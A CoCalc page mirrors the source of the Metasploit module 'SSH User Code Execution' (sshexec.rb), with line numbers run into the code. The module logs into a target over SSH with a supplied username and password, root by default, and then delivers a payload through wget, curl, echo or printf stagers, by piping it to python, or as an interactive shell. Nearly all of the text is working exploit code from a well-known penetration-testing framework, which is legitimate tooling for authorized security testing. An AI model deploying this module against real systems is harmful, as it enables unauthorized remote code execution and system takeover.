CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/exploits/multi/ssh/sshexec.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = ManualRanking78include Msf::Exploit::CmdStager9include Msf::Exploit::Remote::SSH1011attr_accessor :ssh_socket1213def initialize14super(15'Name' => 'SSH User Code Execution',16'Description' => %q(17This module connects to the target system and executes the necessary18commands to run the specified payload via SSH. If a native payload is19specified, an appropriate stager will be used.20),21'Author' => ['Spencer McIntyre', 'Brandon Knight'],22'References' =>23[24[ 'CVE', '1999-0502'] # Weak password25],26'License' => MSF_LICENSE,27'Privileged' => true,28'DefaultOptions' =>29{30'PrependFork' => 'true',31'EXITFUNC' => 'process'32},33'Payload' =>34{35'Space' => 800000,36'BadChars' => "",37'DisableNops' => true38},39'Platform' => %w[linux osx unix python bsd],40'CmdStagerFlavor' => %w[bourne echo printf wget],41'Targets' =>42[43[44'Linux Command',45{46'Arch' => ARCH_CMD,47'Platform' => 'linux'48}49],50[51'Linux x86',52{53'Arch' => ARCH_X86,54'Platform' => 'linux'55}56],57[58'Linux x64',59{60'Arch' => ARCH_X64,61'Platform' => 'linux'62}63],64[65'Linux armle',66{67'Arch' => ARCH_ARMLE,68'Platform' => 'linux'69}70],71[72'Linux mipsle',73{74'Arch' => ARCH_MIPSLE,75'Platform' => 'linux',76'CmdStagerFlavor' => %w[curl wget]77}78],79[80'Linux mipsbe',81{82'Arch' => ARCH_MIPSBE,83'Platform' => 'linux',84'CmdStagerFlavor' => %w[wget]85}86],87[88'Linux aarch64',89{90'Arch' => ARCH_AARCH64,91'Platform' => 'linux'92}93],94[95'OSX x86',96{97'Arch' => ARCH_X86,98'Platform' => 'osx',99'CmdStagerFlavor' => %w[curl wget]100}101],102[103'OSX x64',104{105'Arch' => ARCH_X64,106'Platform' => 'osx',107'CmdStagerFlavor' => %w[curl wget]108}109],110[111'BSD x86',112{113'Arch' => ARCH_X86,114'Platform' => 'bsd',115'CmdStagerFlavor' => %w[printf curl wget]116}117],118[119'BSD x64',120{121'Arch' => ARCH_X64,122'Platform' => 'bsd',123'CmdStagerFlavor' => %w[printf curl wget]124}125],126[127'Python',128{129'Arch' => ARCH_PYTHON,130'Platform' => 'python'131}132],133[134'Unix Cmd',135{136'Arch' => ARCH_CMD,137'Platform' => 'unix'138}139],140[141'Interactive SSH',142{143'DefaultOptions' => {144'PAYLOAD' => 'generic/ssh/interact',145'WfsDelay' => 5146},147'Payload' => {148'Compat' => {149'PayloadType' => 'ssh_interact',150}151}152}153]154],155'DefaultTarget' => 0,156# For the CVE157'DisclosureDate' => 'Jan 01 1999',158'Notes' =>159{160'Stability' => [ CRASH_SAFE, ],161'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS, ],162'Reliability' => [ REPEATABLE_SESSION, ],163},164)165166register_options(167[168OptString.new('USERNAME', [ true, "The user to authenticate as.", 'root' ]),169OptString.new('PASSWORD', [ true, "The password to authenticate with.", '' ]),170Opt::RHOST(),171Opt::RPORT(22)172]173)174175register_advanced_options(176[177OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false])178]179)180end181182def execute_command(cmd, opts = {})183vprint_status("Executing #{cmd}")184begin185Timeout.timeout(3.5) { ssh_socket.exec!(cmd) }186rescue Timeout::Error187print_warning('Timed out while waiting for command to return')188@timeout = true189end190end191192def do_login(ip, user, pass, port)193194opt_hash = ssh_client_defaults.merge({195auth_methods: ['password', 'keyboard-interactive'],196port: port,197password: pass198})199200opt_hash[:verbose] = :debug if datastore['SSH_DEBUG']201202begin203self.ssh_socket = Net::SSH.start(ip, user, opt_hash)204rescue Rex::ConnectionError205fail_with(Failure::Unreachable, 'Disconnected during negotiation')206rescue Net::SSH::Disconnect, ::EOFError207fail_with(Failure::Disconnected, 'Timed out during negotiation')208rescue Net::SSH::AuthenticationFailed209fail_with(Failure::NoAccess, 'Failed authentication')210rescue Net::SSH::Exception => e211fail_with(Failure::Unknown, "SSH Error: #{e.class} : #{e.message}")212end213214fail_with(Failure::Unknown, 'Failed to start SSH socket') unless ssh_socket215end216217def binary_exists(binary, platform: nil)218Msf::Sessions::CommandShell.binary_exists(binary, platform: platform, &method(:execute_command))219end220221def execute_python222python_binary = binary_exists('python', platform: 'unix')223python_binary ||= binary_exists('python3', platform: 'unix')224python_binary ||= binary_exists('python2', platform: 'unix')225fail_with(Failure::NoTarget, 'Python was not found on the target system') if python_binary.nil?226227execute_command("echo \"#{payload.encoded}\" | #{python_binary}")228end229230def exploit231do_login(datastore['RHOST'], datastore['USERNAME'], datastore['PASSWORD'], datastore['RPORT'])232233if target.name == 'Interactive SSH'234handler(ssh_socket)235return236end237238print_status("#{datastore['RHOST']}:#{datastore['RPORT']} - Sending stager...")239240case target['Platform']241when 'python'242execute_python243when 'unix'244execute_command(payload.encoded)245else246if target['Arch'] == ARCH_CMD247execute_command(payload.encoded)248else249execute_cmdstager(linemax: 500)250end251end252253@timeout ? ssh_socket.shutdown! : ssh_socket.close254end255end256257258